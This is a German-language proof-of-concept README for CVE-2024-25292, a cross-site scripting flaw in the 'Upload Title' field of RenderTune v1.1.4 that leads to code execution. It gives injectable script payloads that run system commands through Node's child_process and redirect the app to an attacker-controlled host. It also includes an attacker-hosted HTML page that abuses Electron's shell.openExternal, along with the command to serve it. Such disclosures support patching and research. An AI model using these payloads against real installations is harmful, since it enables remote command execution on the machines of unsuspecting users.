
XSS-zu-RCE-Exploit in RenderTune v1.1.4
Ein Proof-of-Concept für die Schwachstelle CVE-2024-25292.
Eine Cross-Site-Scripting (XSS)-Schwachstelle in RenderTune v1.1.4 ermöglicht Angreifern, beliebige Web-Skripte oder HTML über eine manipulierte Nutzlast auszuführen, die in den Parameter 'Upload Title' injiziert wird.
In diesem Repository befinden sich eine beispielhafte verwundbare Anwendung und ein Proof-of-Concept (PoC)-Exploit dafür.
Es handelt sich um eine Schwachstelle, die RCE durch XSS ermöglicht. Es gibt einen XSS-fähigen Teil des Titels, daher handelt es sich um eine Schwachstelle, die RCE durch die Syntax von NodeJS über die Syntax von XSS ermöglicht.
Schritt 1) Bestätigen, dass XSS im Titelteil auftritt ※ Zu diesem Zeitpunkt wird der Upload-Eintrag nicht registriert, es sei denn, das Bild wird angehängt.
<b>jruru</b>

Schritt 2) Daher wird es konfiguriert, XSS zu verwenden, um NodeJS-Systembefehle auszuführen.
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

※ Wenn Sie einen Angriff mit window.location versuchen, gelangen Sie automatisch zu der von Ihnen festgelegten Seite, jedes Mal wenn Sie die App ausführen.
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>
Hinweis: ※ Wenn Sie es schnell testen möchten, erstellen Sie einen Server auf dem PC des Angreifers mit folgendem Code.
$ python -m http.server 80
<html>
<head>
<title>jruru Link</title>
</head>
<body>
<!-- Run scripts using on-click properties directly to the tag -->
<a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>
<script>
// Script function definition
function openExternal() {
try {
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
} catch(e) {
alert('JRURU');
alert(e);
}
}
// Run script automatically when loading pages
document.addEventListener('DOMContentLoaded', function() {
openExternal();
});
</script>
</body>
</html>
